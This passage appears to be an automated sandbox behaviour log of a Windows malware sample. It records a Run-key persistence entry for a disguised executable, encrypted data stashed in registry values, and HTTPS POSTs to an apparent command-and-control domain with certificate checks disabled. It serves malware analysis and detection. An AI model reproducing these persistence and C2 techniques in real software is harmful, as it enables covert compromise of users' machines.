| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
10 | |
| Mutex | Release | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:44 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1688 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:49 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close P9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close P9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 3224 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, size = 720 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
